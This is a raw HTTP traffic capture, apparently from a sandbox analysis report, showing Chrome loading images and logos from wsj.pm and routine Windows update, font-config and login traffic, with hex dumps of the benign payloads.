                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:10:20 GMT
                                                                                                                ETag: "3326-61648e672bf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 13094
                                                                                                                Connection: close
                                                                                                                Content-Type: image/vnd.microsoft.icon
                                                                                                                2024-04-25 14:58:21 UTC7926INData Raw: 00 00 01 00 04 00 40 40 00 00 01 00 08 00 28 16 00 00 46 00 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 6e 16 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 16 25 00 00 10 10 00 00 01 00 08 00 68 05 00 00 be 2d 00 00 28 00 00 00 40 00 00 00 80 00 00 00 01 00 08 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 cb cb cb 00 8f 8f 8f 00 53 53 53 00 17 17 17 00 e2 e2 e2 00 a6 a6 a6 00 2e 2e 2e 00 f9 f9 f9 00 bd bd bd 00 81 81 81 00 45 45 45 00 09 09 09 00 d4 d4 d4 00 98 98 98 00 5c 5c 5c 00 20 20 20 00 eb eb eb 00 af af af 00 73 73 73 00 37 37 37 00 c6 c6 c6 00 8a 8a 8a 00 4e 4e 4e 00 12 12 12 00 dd dd dd 00 a1 a1 a1 00 65 65 65 00 29 29 29 00 f4 f4 f4 00 b8 b8 b8 00 40 40 40 00 04 04 04 00 93 93 93 00 1b 1b 1b 00 e6 e6 e6 00 6e
                                                                                                                Data Ascii: @@(F00n %h-(@SSS...EEE\\\ sss777NNNeee)))@@@n
                                                                                                                2024-04-25 14:58:21 UTC5168INData Raw: 3c 86 67 bd 86 21 86 86 45 86 8f 00 3d 65 00 78 86 45 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 86 45 86 b5 00 00 09 86 59 96 95 00 00 2e 86 08 ad 86 86 b7 21 86 29 00 3d 1b 00 63 86 21 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 b7 86 86 ad 00 00 a1 86 22 a6 79 00 00 9d 86 1f 5e 2c 86 6c 86 99 7f 00 1b 00 05 86 45 b7 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 b7 86 5c 40 00 23 24 86 10 75 83 00 90 87 86 86 0a bf 86 b7 07 12 00 7f 00 3b 21 b7 b7 86 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 45 86 22 90 00 2f 57 86 86 6f 00 00 03 b3 86 86 a9 6e 86 86 74 00 1b 00 3f 6c 21 86 5f b3 86 b7 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 45 86 b0 00 00 3f 86 6c 86 a2 00 00 27 b7 45 86 81 1e 86 86 43 00 00 97 73 86 45 86
                                                                                                                Data Ascii: <g!E=exE`EEY.!)=c!`E"y^,lE`E\@#$u;!`EE"/Wont?l!_`EE?l'ECsE


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                49192.168.2.1749775103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC348OUTGET /img/im-647221.avif HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC251INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:18:01 GMT
                                                                                                                ETag: "1391-6164901ed0c40"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5009
                                                                                                                Connection: close
                                                                                                                Content-Type: image/avif
                                                                                                                2024-04-25 14:58:21 UTC5009INData Raw: 00 00 00 20 66 74 79 70 61 76 69 66 00 00 00 00 61 76 69 66 6d 69 66 31 6d 69 61 66 4d 41 31 42 00 00 10 f7 6d 65 74 61 00 00 00 00 00 00 00 28 68 64 6c 72 00 00 00 00 00 00 00 00 70 69 63 74 00 00 00 00 00 00 00 00 00 00 00 00 6c 69 62 61 76 69 66 00 00 00 00 0e 70 69 74 6d 00 00 00 00 00 01 00 00 00 1e 69 6c 6f 63 00 00 00 00 44 00 00 01 00 01 00 00 00 01 00 00 11 1f 00 00 02 72 00 00 00 28 69 69 6e 66 00 00 00 00 00 01 00 00 00 1a 69 6e 66 65 02 00 00 00 00 01 00 00 61 76 30 31 43 6f 6c 6f 72 00 00 00 10 6f 69 70 72 70 00 00 10 4f 69 70 63 6f 00 00 00 14 69 73 70 65 00 00 00 00 00 00 00 3c 00 00 00 3c 00 00 00 10 70 69 78 69 00 00 00 00 03 08 08 08 00 00 00 0c 61 76 31 43 81 00 0c 00 00 00 10 04 63 6f 6c 72 70 72 6f 66 00 00 0f f8 61 70 70 6c 02 10 00
                                                                                                                Data Ascii: ftypavifavifmif1miafMA1Bmeta(hdlrpictlibavifpitmilocDr(iinfinfeav01ColoroiprpOipcoispe<<pixiav1Ccolrprofappl


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                50192.168.2.1749776103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC358OUTGET /img/google-play.4699f3c2.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:06 GMT
                                                                                                                ETag: "194b-6164925fc9d80"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 6475
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC6475INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 31 35 2e 38 20 32 37 2e 33 22 3e 3c 67 20 64 69 73 70 6c 61 79 3d 22 6e 6f 6e 65 22 3e 3c 70 61 74 68 20 64 69 73 70 6c 61 79 3d 22 69 6e 6c 69 6e 65 22 20 64 3d 22 4d 31 32 30 2c 33 33 2e 32 48 2d 35 63 2d 32 2e 38 2c 30 2d 35 2d 32 2e 32 2d 35 2d 35 76 2d 33 30 63 30 2d 32 2e 38 2c 32 2e 32 2d 35 2c 35 2d 35 68 31 32 35 63 32 2e 38 2c 30 2c 35 2c 32 2e 32 2c 35 2c 35 76 33 30 43 31 32 35 2c 33 31 2c 31 32 32 2e 38 2c 33 33 2e 32 2c 31 32 30 2c 33 33 2e 32 7a 22 2f 3e 3c 2f 67 3e 3c 67 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 73 74 72 6f 6b 65 3d 22 23 46 46 46 46 46 46
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 115.8 27.3"><g display="none"><path display="inline" d="M120,33.2H-5c-2.8,0-5-2.2-5-5v-30c0-2.8,2.2-5,5-5h125c2.8,0,5,2.2,5,5v30C125,31,122.8,33.2,120,33.2z"/></g><g><path fill="#FFFFFF" stroke="#FFFFFF


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                51192.168.2.1749777103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC355OUTGET /img/appstore.a6e93ba3.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC254INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:28:18 GMT
                                                                                                                ETag: "1558-6164926b3b880"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 5464
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC5464INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 39 39 2e 35 20 32 35 2e 31 22 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 67 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 46 46 46 46 22 20 64 3d 22 4d 31 34 2e 38 2c 31 31 2e 39 63 30 2d 31 2e 37 2c 30 2e 39 2d 33 2e 33 2c 32 2e 34 2d 34 2e 32 63 2d 30 2e 39 2d 31 2e 33 2d 32 2e 34 2d 32 2e 31 2d 34 2d 32 2e 32 63 2d 31 2e 37 2d 30 2e 32 2d 33 2e 33 2c 31 2d 34 2e 32 2c 31 20 63 2d 30 2e 39 2c 30 2d 32 2e 32 2d 31 2d 33 2e 36 2d 31 43 33 2e 35 2c 35 2e 37 2c 31 2e 38 2c 36 2e 37 2c 30 2e 39 2c 38 2e 33 63 2d 31 2e 39 2c 33 2e 33 2d 30 2e 35 2c 38 2e 33 2c 31 2e 34 2c 31 31 63 30 2e 39 2c 31 2e 33
                                                                                                                Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 99.5 25.1"><g><g><g><g><g><path fill="#FFFFFF" d="M14.8,11.9c0-1.7,0.9-3.3,2.4-4.2c-0.9-1.3-2.4-2.1-4-2.2c-1.7-0.2-3.3,1-4.2,1 c-0.9,0-2.2-1-3.6-1C3.5,5.7,1.8,6.7,0.9,8.3c-1.9,3.3-0.5,8.3,1.4,11c0.9,1.3


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                52192.168.2.1749778103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:21 UTC365OUTGET /img/wsj-logo-big-black.e653dfca.svg HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:21 UTC255INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:21 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:27:50 GMT
                                                                                                                ETag: "442b-6164925087980"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 17451
                                                                                                                Connection: close
                                                                                                                Content-Type: image/svg+xml
                                                                                                                2024-04-25 14:58:21 UTC7937INData Raw: 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 33 22 20 68 65 69 67 68 74 3d 22 34 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 34 33 20 34 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 36 2e 37 31 39 37 35 20 31 39 2e 34 36 38 34 43 36 2e 37 31 39 37 35 20 32 30 2e 34 32 34 38 20 36 2e 39 39 32 30 31 20 32 30 2e 36 30 39 32 20 37 2e 35 39 37 37 34 20 32 30 2e 37 36 34 32 4c 38 2e 35 33 36 30 34 20 32 30 2e 39 38 30 33 56 32 31 2e 34 31 32 34 48 32 2e 33 30 30 35 32 56 32 30 2e 39 38 30 33 4c 33 2e
                                                                                                                Data Ascii: <svg width="243" height="46" viewBox="0 0 243 46" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M6.71975 19.4684C6.71975 20.4248 6.99201 20.6092 7.59774 20.7642L8.53604 20.9803V21.4124H2.30052V20.9803L3.
                                                                                                                2024-04-25 14:58:22 UTC8000INData Raw: 36 30 38 20 32 2e 30 33 36 32 56 31 36 2e 37 35 33 33 43 31 38 37 2e 36 30 38 20 31 39 2e 37 34 35 39 20 31 38 38 2e 34 35 35 20 32 30 2e 35 31 37 35 20 31 38 39 2e 39 39 39 20 32 30 2e 35 31 37 35 43 31 39 31 2e 38 31 36 20 32 30 2e 35 31 37 35 20 31 39 32 2e 35 37 33 20 31 39 2e 34 36 38 34 20 31 39 32 2e 35 37 33 20 31 36 2e 34 34 34 36 56 34 2e 31 36 35 30 35 43 31 39 32 2e 35 37 33 20 31 2e 35 37 33 33 36 20 31 39 32 2e 35 34 32 20 30 2e 39 35 36 34 30 33 20 31 39 31 2e 34 35 33 20 30 2e 37 30 39 36 31 38 4c 31 39 30 2e 38 37 38 20 30 2e 35 38 36 32 32 36 56 30 2e 31 35 34 31 32 37 48 32 30 30 2e 38 30 36 43 32 30 33 2e 33 37 39 20 30 2e 31 35 34 31 32 37 20 32 30 35 2e 37 37 20 31 2e 38 32 30 31 35 20 32 30 35 2e 37 37 20 35 2e 33 30 36 33 32 43 32
                                                                                                                Data Ascii: 608 2.0362V16.7533C187.608 19.7459 188.455 20.5175 189.999 20.5175C191.816 20.5175 192.573 19.4684 192.573 16.4446V4.16505C192.573 1.57336 192.542 0.956403 191.453 0.709618L190.878 0.586226V0.154127H200.806C203.379 0.154127 205.77 1.82015 205.77 5.30632C2
                                                                                                                2024-04-25 14:58:22 UTC1514INData Raw: 33 36 2e 38 37 30 33 20 31 31 39 2e 37 38 34 20 33 35 2e 33 38 35 33 20 31 31 38 2e 30 31 34 20 33 35 2e 33 38 35 33 43 31 31 37 2e 30 35 34 20 33 35 2e 33 38 35 33 20 31 31 36 2e 33 36 34 20 33 35 2e 38 30 35 33 20 31 31 35 2e 38 33 39 20 33 36 2e 32 34 30 33 4c 31 31 35 2e 36 31 34 20 33 35 2e 35 33 35 33 48 31 31 34 2e 35 30 34 56 34 35 2e 39 30 30 33 48 31 31 35 2e 39 34 34 56 34 32 2e 38 32 35 33 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 32 35 2e 32 30 39 20 34 32 2e 32 35 35 33 43 31 32 34 2e 32 37 39 20 34 32 2e 32 35 35 33 20 31 32 33 2e 37 33 39 20 34 31 2e 37 37 35 33 20 31 32 33 2e 37 33 39 20 34 30 2e 39 35 30 33 43 31 32 33 2e 37 33 39 20 34 30 2e 36 30 35 33 20 31 32 33 2e 38 34 34 20 34 30 2e 32
                                                                                                                Data Ascii: 36.8703 119.784 35.3853 118.014 35.3853C117.054 35.3853 116.364 35.8053 115.839 36.2403L115.614 35.5353H114.504V45.9003H115.944V42.8253Z" fill="black"/><path d="M125.209 42.2553C124.279 42.2553 123.739 41.7753 123.739 40.9503C123.739 40.6053 123.844 40.2


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                53192.168.2.1749779103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:22 UTC341OUTGET /favicon.ico HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: none
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:22 UTC266INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:22 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Wed, 17 Apr 2024 11:10:20 GMT
                                                                                                                ETag: "3326-61648e672bf00"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 13094
                                                                                                                Connection: close
                                                                                                                Content-Type: image/vnd.microsoft.icon
                                                                                                                2024-04-25 14:58:22 UTC7926INData Raw: 00 00 01 00 04 00 40 40 00 00 01 00 08 00 28 16 00 00 46 00 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 6e 16 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 16 25 00 00 10 10 00 00 01 00 08 00 68 05 00 00 be 2d 00 00 28 00 00 00 40 00 00 00 80 00 00 00 01 00 08 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 cb cb cb 00 8f 8f 8f 00 53 53 53 00 17 17 17 00 e2 e2 e2 00 a6 a6 a6 00 2e 2e 2e 00 f9 f9 f9 00 bd bd bd 00 81 81 81 00 45 45 45 00 09 09 09 00 d4 d4 d4 00 98 98 98 00 5c 5c 5c 00 20 20 20 00 eb eb eb 00 af af af 00 73 73 73 00 37 37 37 00 c6 c6 c6 00 8a 8a 8a 00 4e 4e 4e 00 12 12 12 00 dd dd dd 00 a1 a1 a1 00 65 65 65 00 29 29 29 00 f4 f4 f4 00 b8 b8 b8 00 40 40 40 00 04 04 04 00 93 93 93 00 1b 1b 1b 00 e6 e6 e6 00 6e
                                                                                                                Data Ascii: @@(F00n %h-(@SSS...EEE\\\ sss777NNNeee)))@@@n
                                                                                                                2024-04-25 14:58:22 UTC5168INData Raw: 3c 86 67 bd 86 21 86 86 45 86 8f 00 3d 65 00 78 86 45 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 86 45 86 b5 00 00 09 86 59 96 95 00 00 2e 86 08 ad 86 86 b7 21 86 29 00 3d 1b 00 63 86 21 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 b7 86 86 ad 00 00 a1 86 22 a6 79 00 00 9d 86 1f 5e 2c 86 6c 86 99 7f 00 1b 00 05 86 45 b7 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 b7 86 5c 40 00 23 24 86 10 75 83 00 90 87 86 86 0a bf 86 b7 07 12 00 7f 00 3b 21 b7 b7 86 86 86 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 45 86 22 90 00 2f 57 86 86 6f 00 00 03 b3 86 86 a9 6e 86 86 74 00 1b 00 3f 6c 21 86 5f b3 86 b7 86 86 b7 86 60 00 00 15 86 45 86 86 86 86 86 86 45 86 b0 00 00 3f 86 6c 86 a2 00 00 27 b7 45 86 81 1e 86 86 43 00 00 97 73 86 45 86
                                                                                                                Data Ascii: <g!E=exE`EEY.!)=c!`E"y^,lE`E\@#$u;!`EE"/Wont?l!_`EE?l'ECsE


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                54192.168.2.174978020.114.59.183443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:28 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
                                                                                                                2024-04-25 14:58:28 UTC560INHTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                MS-CorrelationId: 9b4c8f58-3089-4ae5-808a-e9ee32e0f387
                                                                                                                MS-RequestId: c9d726c9-f984-48f9-9ae6-c522871dd194
                                                                                                                MS-CV: 5+kjInXdlk6vKal5.0
                                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Thu, 25 Apr 2024 14:58:27 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 24490
                                                                                                                2024-04-25 14:58:28 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                2024-04-25 14:58:28 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                55192.168.2.1749784184.31.62.93443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:37 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-04-25 14:58:37 UTC467INHTTP/1.1 200 OK
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/0790)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=144298
                                                                                                                Date: Thu, 25 Apr 2024 14:58:37 GMT
                                                                                                                Connection: close
                                                                                                                X-CID: 2


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                56192.168.2.1749786184.31.62.93443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:38 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Range: bytes=0-2147483646
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-04-25 14:58:38 UTC515INHTTP/1.1 200 OK
                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/0758)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=144297
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                X-CID: 2
                                                                                                                2024-04-25 14:58:38 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                57192.168.2.174978540.126.28.14443
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:38 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/soap+xml
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                Content-Length: 4788
                                                                                                                Host: login.live.com
